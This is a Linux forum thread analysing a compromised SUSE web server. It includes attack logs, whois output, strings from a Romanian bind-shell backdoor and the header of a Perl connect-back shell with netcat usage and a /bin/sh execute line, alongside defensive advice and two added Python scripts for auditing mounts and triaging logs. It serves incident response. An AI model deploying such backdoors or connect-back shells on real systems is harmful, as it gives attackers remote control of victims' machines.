[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] script '/srv/www/vhosts/susebox/html/xmlrpc.php' not found or unable to stat
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/xmlrpc
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/xmlsrv
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/blog
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/drupal
[Sat Jul 01 13:17:31 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/community
[Sat Jul 01 13:17:32 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/blogs
[Sat Jul 01 13:17:32 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/blogs
what does this mean? not resolving?
http://www.dnsstuff.com/tools/ptr.ch?ip=66.221.68.185
 
Old 07-08-2006, 12:03 AM   #7
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
Originally Posted by Boss Hoss
we know something really happened on Jul 1 16:51 because a new user was added to the server verified by checking the last date stamp on /etc/passwd
Yeah, that's real bad. You'd need root access to do that, so a complete format and rebuild from trusted media is necessary. Also consider all passwords to be compromised.

Quote:
other oddities:
Looks like error messages from someone running a tool scanning for common vulnerabilities. I've never run SuSE as a webserver, but I'm assuming that it has a standard access log of all activity (like /var/log/http/access_log). I'm looking for something with the raw URLs so that you can see the exact exploit initially used.

Quote:
what does this mean? not resolving?
Don't know why it's not resolving (finding a corresponding DNS entry for that IP) on their end (might be the server they are querying). Works for me:

$whois -h whois.arin.net 66.221.68.185
Results:

OrgName: C I Host
OrgID: CIHS
Address: 1851 Central Drive
Address: #110
City: Bedford
StateProv: TX
PostalCode: 76112
Country: US

NetRange: 66.221.0.0 - 66.221.255.255
CIDR: 66.221.0.0/16
NetName: CIHOST7
NetHandle: NET-66-221-0-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS.CIHOST.COM
NameServer: NS2.CIHOST.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-01-17
Updated: 2002-06-17

RTechHandle: NC61-ARIN
RTechName: Network Operations Center
RTechPhone: +1-888-868-9931
RTechEmail: noc@cihost.com

OrgAbuseHandle: ABUSE821-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-888-868-9931
OrgAbuseEmail: abuse@cihost.com

OrgTechHandle: NC61-ARIN
OrgTechName: Network Operations Center
OrgTechPhone: +1-888-868-9931
OrgTechEmail: noc@cihost.com

# ARIN WHOIS database, last updated 2006-07-07 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Last edited by Capt_Caveman; 07-08-2006 at 12:05 AM.
 
Old 07-08-2006, 12:25 AM   #8
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
I have a log file for each vhost setup. (eg /var/log/apache2/vhost_access.log )

here are the access_log entries for the last oddity I posted
Code:
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /ads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /blog/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /drupal/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:31 -0400] "GET /community/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:32 -0400] "GET /blogs/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:32 -0400] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
193.109.122.56 - - [01/Jul/2006:13:32:14 -0400] "CONNECT 193.109.122.67:6668 HTTP/1.0" 302 - "-" "pxyscand/2.1"
195.47.220.2 - - [01/Jul/2006:13:40:45 -0400] "POST http://194.109.153.2:6667/ HTTP/1.0" 302 - "-" "-"
195.47.220.2 - - [01/Jul/2006:13:40:45 -0400] "CONNECT 194.109.153.2:6667 HTTP/1.0" 302 - "-" "-"
208.66.195.2 - - [01/Jul/2006:16:32:30 -0400] "GET /robots.txt HTTP/1.1" 200 27 "-" "psycheclone"
208.66.195.2 - - [01/Jul/2006:16:32:32 -0400] "GET / HTTP/1.1" 302 - "-" "psycheclone"
 
Old 07-08-2006, 12:31 AM   #9
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: Slackware, Termux
Posts: 922

Rep: Reputation: 339
Well, you got at least one backdoor running on there. Here's his "bash", a very common Romanian backdoor (selected strings output):

Code:
Baga Parola d3co: 
Upss... Parola Gresita .. Protected by : Morfeus!
pqrstuvwxyzabcde
0123456789abcdef
/dev/ptmx
/dev/pty
/dev/tty
socket
bind
listen
Incerc Sa Pornesc Bindu...
OK, pidul este: %d
Am Pornit Bindul ... Multumitimi mie: Morfeus @ Undernet :D
/dev/null
/tmp/
HOME=%s
Can't fork pty, bye!
/bin/sh
mafiaro
Neatza ... Ai Reusit Sa Intri Intrun root In Loc Sa Stai La Asl Pls Stf :D
"super.tar.gz" was gone by the time I found this post, but likely it's the "super.tar.gz" I've seen in the past, a root-kit with PsyBNC (IRC bouncer), the entire thing infected by rst.linux.02 virus.

"x" is a Perl connect back script, these are stuck on exploited systems to help access other systems they want to take over:

Code:
#!/usr/bin/perl
#
# A perl based connect back shell
#
# usage:
#
# $netcat -l -s 127.0.0.1 -p 10001
# $./cbs.pl 127.0.0.1 10001
#
# qobaiashi@u-n-f.com
#
use Socket;

$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';
He's a Script kiddie ("chmod 755 bash" the command he's looking for?). The script also had MSDOS line endings (^M).

Code:
sh: chmdo: command not found
sh: ./bash: Permission denied
sh: ./bash: Permission denied
sh: locate: command not found
The "proxyscand" stuff is likely the IRC server's proxy scanner checking the connecting system for open ports. It doesn't like mine, I guess.

Code:
*** Performing DNS lookup for [194.109.153.2] (server 6)
*** DNS lookup for server 6 [194.109.153.2] returned (1) addresses
*** Connecting to server refnum 6 (194.109.153.2), using address 1 (194.109.
+153.2:6667)
*** Odd server stuff: "Proxy Check" (*)
*** INFO -- unix_recv: read(3) failed: Connection reset by peer
*** INFO -- new_io_event: io_callback(3) said fd should be closed
*** INFO -- dgets: Reporting exception for vfd [3]
*** Connection closed from 194.109.153.2
Likely it hit my telnet or ssh tarpits...

Wipe & reformat the lot of it, then make sure you keep up to date on your software. Old PHP scripts look like your downfall here.

Also, consider mounting /tmp and /var/tmp like this:

Code:
/dev/hdf1 on /var/tmp type ext2 (rw,noexec,nosuid,nodev)
/dev/hdf2 on /tmp type ext2 (rw,noexec,nosuid,nodev)
which stops a lot of cook-book type bots, scripts, and backdoors that assume they can write to /tmp and then execute.

Last edited by jayjwa; 07-08-2006 at 12:47 AM.
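To make the noexec/nosuid/nodev advice above checkable, here is an added example (editor's code, not posted by anyone in this thread). It parses lines in the format `mount` prints, the same format as the two lines quoted in the post, reports which of the three options each tmp filesystem is missing or whether the path is not a separate mount at all, and builds the /etc/fstab entry that would add the missing options. The `mount` output it runs on is constructed; the `/dev/hdf*` device names are simply reused from the post.

```python
"""Audit /tmp and /var/tmp for the noexec, nosuid and nodev mount options.

Added example for this thread (not a participant's code). Input is the text
printed by `mount`; SAMPLE_MOUNT_OUTPUT below is constructed so that /var/tmp
is hardened exactly as in the post and /tmp is only partly hardened.
"""
import re
import subprocess

# "<device> on <path> type <fstype> (<comma-separated options>)", optionally followed by extra text
MOUNT_RE = re.compile(
    r"^(?P<dev>\S+) on (?P<path>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)(?:\s.*)?$"
)
REQUIRED = ("noexec", "nosuid", "nodev")
TMP_PATHS = ("/tmp", "/var/tmp")

# Constructed `mount` output (not from the thread).
SAMPLE_MOUNT_OUTPUT = """\
/dev/hda1 on / type ext3 (rw)
proc on /proc type proc (rw)
/dev/hdf1 on /var/tmp type ext2 (rw,noexec,nosuid,nodev)
/dev/hdf2 on /tmp type ext2 (rw,nosuid)
"""


def parse_mounts(text):
    """Map mount point -> {dev, fstype, opts (list, original order)}."""
    mounts = {}
    for line in text.splitlines():
        m = MOUNT_RE.match(line.strip())
        if m:
            mounts[m.group("path")] = {
                "dev": m.group("dev"),
                "fstype": m.group("fstype"),
                "opts": m.group("opts").split(","),
            }
    return mounts


def audit_tmp_mounts(text, paths=TMP_PATHS, required=REQUIRED):
    """Return {path: finding}. A finding is the list of missing options, or the
    string 'not a separate mount' when the path inherits its parent's options
    (so anything dropped there is executable if the parent allows it)."""
    mounts = parse_mounts(text)
    findings = {}
    for path in paths:
        if path not in mounts:
            findings[path] = "not a separate mount"
            continue
        missing = [o for o in required if o not in mounts[path]["opts"]]
        if missing:
            findings[path] = missing
    return findings


def hardened_fstab_line(text, path, required=REQUIRED):
    """Build the /etc/fstab entry that keeps the current options and adds the
    missing hardening options for an existing separate mount."""
    mounts = parse_mounts(text)
    if path not in mounts:
        raise KeyError(f"{path} is not a separate mount; create a filesystem (or tmpfs) for it first")
    m = mounts[path]
    opts = m["opts"] + [o for o in required if o not in m["opts"]]
    return f"{m['dev']} {path} {m['fstype']} {','.join(opts)} 0 0"


if __name__ == "__main__":
    # On a live box, audit the real mount table instead of the constructed sample.
    real = subprocess.run(["mount"], capture_output=True, text=True).stdout
    for path, finding in audit_tmp_mounts(real).items():
        print(f"{path}: {finding}")
```

Treat a clean result as one layer only: noexec prevents running a file placed on that filesystem directly, and nosuid/nodev stop setuid binaries and device nodes there, but it is the reinstall from trusted media that the other posts insist on, not this mount option, that clears an existing root compromise.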
 
Old 07-08-2006, 11:32 AM   #10
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
Originally Posted by Boss Hoss
I have a log file for each vhost setup. (eg /var/log/apache2/vhost_access.log )
here are the access_log entries for the last oddity I posted
Those are all 404/302, so those are all failed attempts (with the exception of robots.txt which is for informational purposes). I don't believe they are related to the initial compromise, in fact I doubt that is the same cracker. Take a look at the other http logs (including older rotated logs if necessary) for odd URLs with 200 status codes. In particular, try looking around times when the initial compromise occurred (June 10-15).
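The two steps Capt_Caveman describes, separating the noisy scanner traffic in post #8 from requests that actually succeeded inside the suspected compromise window, are a small parsing job. The following is an added example (editor's code, not from anyone in this thread). It parses Apache combined-format lines, groups 404s per client to flag scanner bursts, picks out CONNECT and absolute-URI requests (the open-proxy probes seen in the log), and then lists 200 responses and POSTs within a date range. The sample lines are constructed: the 66.221.68.185, 193.109.122.56, 195.47.220.2 and 208.66.195.2 entries are copied from the post, while the 10.0.0.7 lines are made up to show what a successful hit inside the June 10-15 window would look like when filtered.

```python
"""Triage of Apache combined-format access log lines (added example, not
code from the thread). Two views a responder wants: (1) who is scanning,
and (2) which requests in the compromise window actually returned 200 or
were POSTs, since those are the candidates for the real entry point."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: real lines from the post plus two invented 10.0.0.7 lines.
SAMPLE_LOG = """\
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:27 -0400] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:28 -0400] "GET /blog/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
66.221.68.185 - - [01/Jul/2006:13:17:32 -0400] "GET /blogs/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
193.109.122.56 - - [01/Jul/2006:13:32:14 -0400] "CONNECT 193.109.122.67:6668 HTTP/1.0" 302 - "-" "pxyscand/2.1"
195.47.220.2 - - [01/Jul/2006:13:40:45 -0400] "POST http://194.109.153.2:6667/ HTTP/1.0" 302 - "-" "-"
208.66.195.2 - - [01/Jul/2006:16:32:30 -0400] "GET /robots.txt HTTP/1.1" 200 27 "-" "psycheclone"
10.0.0.7 - - [12/Jun/2006:03:14:09 -0400] "POST /adserver/adxmlrpc.php HTTP/1.0" 200 512 "-" "-"
10.0.0.7 - - [12/Jun/2006:03:14:11 -0400] "GET /index.php HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
"""


def parse(lines):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        parts = d["request"].split(" ")
        entries.append({
            "ip": d["ip"],
            "time": datetime.strptime(d["time"], TIME_FMT),
            "method": parts[0] if parts else "",
            "path": parts[1] if len(parts) > 1 else "",
            "status": int(d["status"]),
            "agent": d["agent"],
        })
    return entries


def scanner_bursts(entries, min_paths=3, window=timedelta(seconds=10)):
    """{ip: n} for clients that requested >= min_paths distinct missing (404)
    paths within `window`; n is the largest such burst. This is the signature
    of a tool walking a list of known script locations."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["status"] == 404:
            by_ip[e["ip"]].append(e)
    bursts = {}
    for ip, hits in by_ip.items():
        hits.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(hits)):           # sliding window over sorted 404s
            while hits[end]["time"] - hits[start]["time"] > window:
                start += 1
            distinct = {h["path"] for h in hits[start:end + 1]}
            if len(distinct) >= min_paths:
                bursts[ip] = max(bursts.get(ip, 0), len(distinct))
    return bursts


def proxy_checks(entries):
    """CONNECT or absolute-URI requests: something testing whether this web
    server will relay to another host (the IRC proxy scanner in the post)."""
    return [e for e in entries
            if e["method"] == "CONNECT" or e["path"].startswith(("http://", "https://"))]


def compromise_window_hits(entries, start_str, end_str):
    """Requests inside [start, end] that returned 200 or were POSTs; these,
    not the 404s, are what to read by hand when hunting the entry point."""
    start = datetime.strptime(start_str, TIME_FMT)
    end = datetime.strptime(end_str, TIME_FMT)
    return [e for e in entries
            if start <= e["time"] <= end and (e["status"] == 200 or e["method"] == "POST")]


if __name__ == "__main__":
    ents = parse(SAMPLE_LOG.splitlines())
    print("scanner bursts:", scanner_bursts(ents))
    print("proxy probes:", [(e["ip"], e["method"], e["path"]) for e in proxy_checks(ents)])
    for e in compromise_window_hits(ents, "10/Jun/2006:00:00:00 -0400", "15/Jun/2006:23:59:59 -0400"):
        print("window hit:", e["time"], e["ip"], e["method"], e["path"], e["status"])
```

Run it against the per-vhost access logs and the rotated copies (`zcat` them first if compressed) rather than error_log: error_log carries no status codes or raw URLs, which is exactly the information the 200-status filter depends on.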
 
  

